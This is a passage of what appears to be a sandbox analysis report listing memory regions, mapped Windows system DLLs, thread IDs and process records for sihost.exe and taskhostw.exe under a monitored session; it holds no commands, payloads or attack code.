filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 2471
start_va = 0x7ff85d910000
end_va = 0x7ff85d96bfff
monitored = 0
entry_point = 0x7ff85d926f70
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 2472
start_va = 0x7ff85cfe0000
end_va = 0x7ff85d003fff
monitored = 0
entry_point = 0x7ff85cfe3260
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 2503
start_va = 0x7ff85dfe0000
end_va = 0x7ff85e02afff
monitored = 0
entry_point = 0x7ff85dfe35f0
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 2504
start_va = 0x4400000
end_va = 0x44fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004400000"
filename = ""
Region:
id = 2506
start_va = 0x7ff856c00000
end_va = 0x7ff856c15fff
monitored = 0
entry_point = 0x7ff856c019f0
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 2507
start_va = 0x7ff85cb60000
end_va = 0x7ff85cc09fff
monitored = 0
entry_point = 0x7ff85cb87910
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 2508
start_va = 0x7ff856be0000
end_va = 0x7ff856bf9fff
monitored = 0
entry_point = 0x7ff856be2430
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 2509
start_va = 0x4500000
end_va = 0x45fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004500000"
filename = ""
Region:
id = 2511
start_va = 0x7ff8560b0000
end_va = 0x7ff8560b9fff
monitored = 0
entry_point = 0x7ff8560b14c0
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 2525
start_va = 0x570000
end_va = 0x571fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000570000"
filename = ""
Thread:
id = 177
os_tid = 0x544
Thread:
id = 178
os_tid = 0x4b4
Thread:
id = 179
os_tid = 0x40c
Thread:
id = 180
os_tid = 0x188
Thread:
id = 181
os_tid = 0x184
Thread:
id = 182
os_tid = 0x180
Thread:
id = 183
os_tid = 0x120
Thread:
id = 184
os_tid = 0x11c
Thread:
id = 185
os_tid = 0x3e8
Thread:
id = 186
os_tid = 0x3c4
Thread:
id = 187
os_tid = 0x3bc
Thread:
id = 188
os_tid = 0x550
Thread:
id = 189
os_tid = 0x564
Thread:
id = 190
os_tid = 0x570
Thread:
id = 191
os_tid = 0x574
Thread:
id = 192
os_tid = 0x578
Thread:
id = 196
os_tid = 0x5b4
Thread:
id = 202
os_tid = 0x5e4
Thread:
id = 204
os_tid = 0x5ec
Process:
id = "10"
image_name = "sihost.exe"
filename = "c:\\windows\\system32\\sihost.exe"
page_root = "0x30922000"
os_pid = "0x588"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "7"
os_parent_pid = "0x360"
cmd_line = "sihost.exe"
cur_dir = "C:\\Windows\\system32\\"
os_username = "XC64ZB\\RDhJ0CNFevzX"
bitness = "32"
os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f2cf" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2417
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2418
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2419
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 2420
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 2421
start_va = 0xe0000
end_va = 0xe1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 2422
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 2423
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2424
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 2425
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 2426
start_va = 0x7ff7df9e0000
end_va = 0x7ff7df9f5fff
monitored = 0
entry_point = 0x7ff7df9e5190
region_type = mapped_file
name = "sihost.exe"
filename = "\\Windows\\System32\\sihost.exe" (normalized: "c:\\windows\\system32\\sihost.exe")
Region:
id = 2427
start_va = 0x7ff8619c0000
end_va = 0x7ff861b80fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2433
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2434
start_va = 0xf0000
end_va = 0x1adfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2435
start_va = 0x530000
end_va = 0x62ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 2436
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 2437
start_va = 0x7ff85e0e0000
end_va = 0x7ff85e2c7fff
monitored = 0
entry_point = 0x7ff85e10ba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2438
start_va = 0x7ff85f160000
end_va = 0x7ff85f20cfff
monitored = 0
entry_point = 0x7ff85f1781a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2439
start_va = 0x7ff85fca0000
end_va = 0x7ff85fd3cfff
monitored = 0
entry_point = 0x7ff85fca78a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2440
start_va = 0x400000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 2441
start_va = 0x7ff85ee20000
end_va = 0x7ff85f09cfff
monitored = 0
entry_point = 0x7ff85eef4970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 2442
start_va = 0x7ff8616d0000
end_va = 0x7ff8617ebfff
monitored = 0
entry_point = 0x7ff8617102b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2443
start_va = 0x7ff85e070000
end_va = 0x7ff85e0d9fff
monitored = 0
entry_point = 0x7ff85e0a6d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 2444
start_va = 0x7ff85f5c0000
end_va = 0x7ff85f61afff
monitored = 0
entry_point = 0x7ff85f5d38b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2445
start_va = 0x7ff85f510000
end_va = 0x7ff85f5b6fff
monitored = 0
entry_point = 0x7ff85f5258d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2446
start_va = 0x20000
end_va = 0x26fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2447
start_va = 0x7ff85d530000
end_va = 0x7ff85d560fff
monitored = 0
entry_point = 0x7ff85d537d10
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 2448
start_va = 0x7ff85bfc0000
end_va = 0x7ff85c07dfff
monitored = 0
entry_point = 0x7ff85c002d40
region_type = mapped_file
name = "coremessaging.dll"
filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll")
Region:
id = 2449
start_va = 0x7ff856200000
end_va = 0x7ff856487fff
monitored = 0
entry_point = 0x7ff85625f670
region_type = mapped_file
name = "coreuicomponents.dll"
filename = "\\Windows\\System32\\CoreUIComponents.dll" (normalized: "c:\\windows\\system32\\coreuicomponents.dll")
Region:
id = 2450
start_va = 0x7ff85e060000
end_va = 0x7ff85e06efff
monitored = 0
entry_point = 0x7ff85e063210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 2451
start_va = 0x7ff85f7f0000
end_va = 0x7ff85f945fff
monitored = 0
entry_point = 0x7ff85f7fa8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2452
start_va = 0x7ff85f210000
end_va = 0x7ff85f395fff
monitored = 0
entry_point = 0x7ff85f25ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2453
start_va = 0x7ff85e410000
end_va = 0x7ff85e4c4fff
monitored = 0
entry_point = 0x7ff85e4522e0
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 2454
start_va = 0x7ff859cb0000
end_va = 0x7ff859de5fff
monitored = 0
entry_point = 0x7ff859cdf350
region_type = mapped_file
name = "wintypes.dll"
filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll")
Region:
id = 2455
start_va = 0x630000
end_va = 0x73ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000630000"
filename = ""
Region:
id = 2456
start_va = 0x1b0000
end_va = 0x1b6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 2457
start_va = 0x1c0000
end_va = 0x1f8fff
monitored = 0
entry_point = 0x1c12f0
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2458
start_va = 0x740000
end_va = 0x8c7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000740000"
filename = ""
Region:
id = 2459
start_va = 0x7ff85f3a0000
end_va = 0x7ff85f3dafff
monitored = 0
entry_point = 0x7ff85f3a12f0
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2460
start_va = 0x8d0000
end_va = 0xa50fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008d0000"
filename = ""
Region:
id = 2461
start_va = 0xa60000
end_va = 0x1e5ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a60000"
filename = ""
Region:
id = 2462
start_va = 0x1c0000
end_va = 0x1c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 2463
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 2464
start_va = 0x630000
end_va = 0x70cfff
monitored = 0
entry_point = 0x68e0b0
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2465
start_va = 0x730000
end_va = 0x73ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000730000"
filename = ""
Region:
id = 2473
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 2474
start_va = 0x7ff85f0a0000
end_va = 0x7ff85f146fff
monitored = 0
entry_point = 0x7ff85f0ab4d0
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2475
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 2476
start_va = 0x7ff8560e0000
end_va = 0x7ff8560fdfff
monitored = 0
entry_point = 0x7ff8560e5340
region_type = mapped_file
name = "desktopshellext.dll"
filename = "\\Windows\\System32\\DesktopShellExt.dll" (normalized: "c:\\windows\\system32\\desktopshellext.dll")
Region:
id = 2477
start_va = 0x7ff8560c0000
end_va = 0x7ff8560d1fff
monitored = 0
entry_point = 0x7ff8560c5110
region_type = mapped_file
name = "windows.shell.servicehostbuilder.dll"
filename = "\\Windows\\System32\\Windows.Shell.ServiceHostBuilder.dll" (normalized: "c:\\windows\\system32\\windows.shell.servicehostbuilder.dll")
Region:
id = 2478
start_va = 0x630000
end_va = 0x72ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000630000"
filename = ""
Region:
id = 2479
start_va = 0x1e60000
end_va = 0x1f3cfff
monitored = 0
entry_point = 0x1ebe0b0
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2483
start_va = 0x480000
end_va = 0x4fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 2484
start_va = 0x1e60000
end_va = 0x1edffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e60000"
filename = ""
Region:
id = 2485
start_va = 0x1ee0000
end_va = 0x1f5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ee0000"
filename = ""
Region:
id = 2505
start_va = 0x1f60000
end_va = 0x1fdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f60000"
filename = ""
Region:
id = 2510
start_va = 0x7ff85b6b0000
end_va = 0x7ff85bb42fff
monitored = 0
entry_point = 0x7ff85b6bf760
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")
Region:
id = 2512
start_va = 0x7ff855fd0000
end_va = 0x7ff8560a9fff
monitored = 0
entry_point = 0x7ff8560203b0
region_type = mapped_file
name = "modernexecserver.dll"
filename = "\\Windows\\System32\\modernexecserver.dll" (normalized: "c:\\windows\\system32\\modernexecserver.dll")
Region:
id = 2513
start_va = 0x7ff85f3e0000
end_va = 0x7ff85f4a0fff
monitored = 0
entry_point = 0x7ff85f400da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2514
start_va = 0x7ff85dfe0000
end_va = 0x7ff85e02afff
monitored = 0
entry_point = 0x7ff85dfe35f0
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 2515
start_va = 0x7ff85cda0000
end_va = 0x7ff85cdc9fff
monitored = 0
entry_point = 0x7ff85cda8b90
region_type = mapped_file
name = "rmclient.dll"
filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll")
Region:
id = 2516
start_va = 0x7ff855f80000
end_va = 0x7ff855fcafff
monitored = 0
entry_point = 0x7ff855f97b70
region_type = mapped_file
name = "veeventdispatcher.dll"
filename = "\\Windows\\System32\\VEEventDispatcher.dll" (normalized: "c:\\windows\\system32\\veeventdispatcher.dll")
Region:
id = 2517
start_va = 0x7ff85cc10000
end_va = 0x7ff85cd0ffff
monitored = 0
entry_point = 0x7ff85cc50f80
region_type = mapped_file
name = "twinapi.appcore.dll"
filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll")
Region:
id = 2518
start_va = 0x7ff85de70000
end_va = 0x7ff85de98fff
monitored = 0
entry_point = 0x7ff85de84530
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 2519
start_va = 0x7ff858b90000
end_va = 0x7ff858c21fff
monitored = 0
entry_point = 0x7ff858bda780
region_type = mapped_file
name = "msvcp110_win.dll"
filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll")
Region:
id = 2520
start_va = 0x1fe0000
end_va = 0x2122fff
monitored = 0
entry_point = 0x2008210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2521
start_va = 0x1fe0000
end_va = 0x205ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001fe0000"
filename = ""
Region:
id = 2522
start_va = 0x500000
end_va = 0x501fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000500000"
filename = ""
Region:
id = 2523
start_va = 0x510000
end_va = 0x510fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000510000"
filename = ""
Region:
id = 2524
start_va = 0x2060000
end_va = 0x213ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 2553
start_va = 0x2140000
end_va = 0x21bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002140000"
filename = ""
Region:
id = 2554
start_va = 0x7ff85c960000
end_va = 0x7ff85c9f5fff
monitored = 0
entry_point = 0x7ff85c985570
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 2555
start_va = 0x21c0000
end_va = 0x21effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021c0000"
filename = ""
Region:
id = 2590
start_va = 0x7ff855e40000
end_va = 0x7ff855e70fff
monitored = 0
entry_point = 0x7ff855e43400
region_type = mapped_file
name = "clipboardserver.dll"
filename = "\\Windows\\System32\\ClipboardServer.dll" (normalized: "c:\\windows\\system32\\clipboardserver.dll")
Region:
id = 2591
start_va = 0x7ff855de0000
end_va = 0x7ff855e3cfff
monitored = 0
entry_point = 0x7ff855df0080
region_type = mapped_file
name = "activationmanager.dll"
filename = "\\Windows\\System32\\ActivationManager.dll" (normalized: "c:\\windows\\system32\\activationmanager.dll")
Region:
id = 2598
start_va = 0x7ff855d10000
end_va = 0x7ff855d32fff
monitored = 0
entry_point = 0x7ff855d13020
region_type = mapped_file
name = "appointmentactivation.dll"
filename = "\\Windows\\System32\\AppointmentActivation.dll" (normalized: "c:\\windows\\system32\\appointmentactivation.dll")
Region:
id = 2617
start_va = 0x21f0000
end_va = 0x226ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021f0000"
filename = ""
Region:
id = 2621
start_va = 0x7ff85fb50000
end_va = 0x7ff85fc92fff
monitored = 0
entry_point = 0x7ff85fb78210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2622
start_va = 0x7ff857c70000
end_va = 0x7ff857cb0fff
monitored = 0
entry_point = 0x7ff857c74840
region_type = mapped_file
name = "usermgrproxy.dll"
filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll")
Region:
id = 2623
start_va = 0x2270000
end_va = 0x22effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002270000"
filename = ""
Region:
id = 2624
start_va = 0x7ff857ed0000
end_va = 0x7ff857edffff
monitored = 0
entry_point = 0x7ff857ed2c60
region_type = mapped_file
name = "usermgrcli.dll"
filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll")
Region:
id = 2625
start_va = 0x22f0000
end_va = 0x23effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022f0000"
filename = ""
Region:
id = 2626
start_va = 0x23f0000
end_va = 0x2beffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000023f0000"
filename = ""
Region:
id = 2627
start_va = 0x2bf0000
end_va = 0x2c6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002bf0000"
filename = ""
Region:
id = 2628
start_va = 0x2c70000
end_va = 0x2ceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c70000"
filename = ""
Region:
id = 2629
start_va = 0x2cf0000
end_va = 0x2d6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002cf0000"
filename = ""
Region:
id = 2630
start_va = 0x7ff855800000
end_va = 0x7ff855843fff
monitored = 0
entry_point = 0x7ff85580c010
region_type = mapped_file
name = "execmodelclient.dll"
filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll")
Region:
id = 2633
start_va = 0x7ff858db0000
end_va = 0x7ff858dbdfff
monitored = 0
entry_point = 0x7ff858db2690
region_type = mapped_file
name = "notificationplatformcomponent.dll"
filename = "\\Windows\\System32\\notificationplatformcomponent.dll" (normalized: "c:\\windows\\system32\\notificationplatformcomponent.dll")
Region:
id = 2634
start_va = 0x7ff855760000
end_va = 0x7ff8557f6fff
monitored = 0
entry_point = 0x7ff855774fd0
region_type = mapped_file
name = "appcontracts.dll"
filename = "\\Windows\\System32\\AppContracts.dll" (normalized: "c:\\windows\\system32\\appcontracts.dll")
Region:
id = 2635
start_va = 0x7ff8556b0000
end_va = 0x7ff855751fff
monitored = 0
entry_point = 0x7ff8556b2b20
region_type = mapped_file
name = "sharehost.dll"
filename = "\\Windows\\System32\\ShareHost.dll" (normalized: "c:\\windows\\system32\\sharehost.dll")
Region:
id = 2636
start_va = 0x7ff85f4b0000
end_va = 0x7ff85f501fff
monitored = 0
entry_point = 0x7ff85f4bf530
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2637
start_va = 0x7ff85e5a0000
end_va = 0x7ff85ebe3fff
monitored = 0
entry_point = 0x7ff85e7664b0
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")
Region:
id = 2638
start_va = 0x7ff85e3c0000
end_va = 0x7ff85e402fff
monitored = 0
entry_point = 0x7ff85e3d4b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 2639
start_va = 0x7ff85e040000
end_va = 0x7ff85e053fff
monitored = 0
entry_point = 0x7ff85e0452e0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 2640
start_va = 0x7ff8556a0000
end_va = 0x7ff8556a8fff
monitored = 0
entry_point = 0x7ff8556a1480
region_type = mapped_file
name = "wpportinglibrary.dll"
filename = "\\Windows\\System32\\WpPortingLibrary.dll" (normalized: "c:\\windows\\system32\\wpportinglibrary.dll")
Region:
id = 2641
start_va = 0x7ff855440000
end_va = 0x7ff85569cfff
monitored = 0
entry_point = 0x7ff8554c8610
region_type = mapped_file
name = "twinui.appcore.dll"
filename = "\\Windows\\System32\\twinui.appcore.dll" (normalized: "c:\\windows\\system32\\twinui.appcore.dll")
Region:
id = 2701
start_va = 0x7ff8553a0000
end_va = 0x7ff8553b4fff
monitored = 0
entry_point = 0x7ff8553a1ab0
region_type = mapped_file
name = "execmodelproxy.dll"
filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll")
Region:
id = 2708
start_va = 0x2d70000
end_va = 0x2deffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d70000"
filename = ""
Region:
id = 2714
start_va = 0x2df0000
end_va = 0x2e6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002df0000"
filename = ""
Thread:
id = 194
os_tid = 0x58c
Thread:
id = 195
os_tid = 0x5ac
Thread:
id = 198
os_tid = 0x5c8
Thread:
id = 199
os_tid = 0x5d0
Thread:
id = 200
os_tid = 0x5d4
Thread:
id = 203
os_tid = 0x5e8
Thread:
id = 205
os_tid = 0x5f0
Thread:
id = 207
os_tid = 0x600
Thread:
id = 213
os_tid = 0x614
Thread:
id = 217
os_tid = 0x648
Thread:
id = 218
os_tid = 0x65c
Thread:
id = 219
os_tid = 0x660
Thread:
id = 220
os_tid = 0x66c
Thread:
id = 228
os_tid = 0x690
Thread:
id = 230
os_tid = 0x6a8
Process:
id = "11"
image_name = "taskhostw.exe"
filename = "c:\\windows\\system32\\taskhostw.exe"
page_root = "0x2f829000"
os_pid = "0x5f4"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "7"
os_parent_pid = "0x360"
cmd_line = "taskhostw.exe"
cur_dir = "C:\\Windows\\system32\\"
os_username = "XC64ZB\\RDhJ0CNFevzX"
bitness = "32"
os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f2cf" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2526
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2527
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2528
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 2529
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 2530
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 2531
start_va = 0xf0000
end_va = 0xf1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 2532
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 2533
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2534
start_va = 0x7df5fffc0000
